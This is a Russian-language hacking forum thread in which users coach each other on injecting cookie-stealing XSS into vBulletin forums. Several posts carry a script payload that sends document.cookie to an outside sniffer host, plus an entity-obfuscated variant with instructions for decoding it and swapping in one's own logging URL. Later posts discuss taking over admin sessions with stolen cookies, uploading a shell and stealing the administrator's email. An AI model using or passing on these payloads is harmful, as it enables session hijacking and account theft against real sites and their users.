Скажите пожалуста как код снифера встовлять в тему......
Вот например код <script>img=new Image(); img.src="http://s.netsec.ru//s.gif?id=591&"+document.cookie;</script>
и все или что то надо менять в этом коде ???
Ответти мне на этот вопрос пожалуста..Я со снифером первый раз роботаю !

В какую тему и какого форума ты это вставлять собрался? Адрес твоего сниффера нужно вставлять в Код Xss специальный для твоей версии форума. А ЭТО просто пример того, как можно украсть куки, но долеко не та конструкция с помощью которой это надо делать=)) Скажи что за форум?

Powered by: vBulletin Version 3.0.5
Помогите плиз

http://www.]wj (wj[url)[/URL]
Вот попробуй. Только удали плюсы из спец. символов, чтобы работало. Закодирован пол сниффер античата.

***************************
http://www.].src="http:/&47;antichat&+#46;ru/cgi-&+#98;in/s.jpg?"+document.cookie;) / ]wj (wj[url)[/URL]
***********************************
Вот-так ??Я плюсы убрал...если нетак плиз розкажи как надо я просто хочю попробывать на зуб XSS

Ну все, вставляй и иди на лог античата. ток вроде плюсы не везде убрал

Вот-так ??Я плюсы убрал...
Мне что, за тебя плюсики уберать? И ГДЕ Ж ТЫ ПЛЮСЫ-ТО убрал????
Я сказал плюсы убрать только в спец. символах! Пример. Было &+#58, а становится просто :, понятно??? Я не знаю, как ещё проще объяснить....
Не забываем про репутацию

а куда конкретно его вставлять в свой пост? и канает ли данная XSS в vBulletin v3.5.2 ?

Extrim Ты не все плюсы убрал!!! Со зрением чтоли плохо? Со второй попытки и то не все=)))
канает ли данная XSS в vBulletin v3.5.2 ?
Нет.

А у кого нить есть этот декодер,чтобы так же делать из букв в такие коды?

cardons А причем тут тема XSS на Bulletin 3.5.0??? НЕ флейми!=)
зы qBiN уже отвечал на ЭТОТ твой вопрос в другой теме.

Вот посмотри теперь правильно ?
http://www.]wj (wj[url)[/URL]

??
Вроде везде пдюсы поубирал ?

перед document.cookie + поставь

а как на свай снифер код зделать /
http://s.netsec.ru/

Вместо ссылки на ачатовский сниффер впиши ссылку к твоему. Вида _http://s.netsec.ru//s.gif?id=[ID]&
зы и всё-таки ещё не все плюсы ты убрал-)

Воще где то было в нете но я просрал страницу. Потом нашёл прогу URICrypt классная штука ищи в нете если что.

Extrim Ты не все плюсы убрал!!! Со зрением чтоли плохо? Со второй попытки и то не все=)))

Нет.
А что тогда канает для данного движка? Есть хоть что-нибудь?

Стырил куки с Bulletin 3.0.7
А в админку попасть не могу! Пишет типа введите логин и пароль... Как добыть то это мокрое дело?

milord69, в булке же соль. Не расшифруешь ты. никак, имхо.

Ок, а что тогда можно под правами админа сделать? Кроме того чтобы удалить все темы. Мож можна как-то шел залить, если под адмиком залогиниться?

Ок, а что тогда можно под правами админа сделать? Кроме того чтобы удалить все темы. Мож можна как-то шел залить, если под адмиком залогиниться?Нет. Нельзя.

блин вот западло и что тогда делать?

блин вот западло и что тогда делать?
Уведи мыло у Админа.

Слушайте короче на video.antichat.ru появился видеоролик по xss в vBulletin.Там создатель в сообщение вставляет код который начинается так [r0x].Вот млжете выложить здесь этот код у кого есть.И скажите пожалуйста логин и пароль эта xss будет высылать на e-mail на котором зарегистрирован мой аккаунт,или надо в код уязвимости вставлять мыло куда бы высылался бы логин и пароль???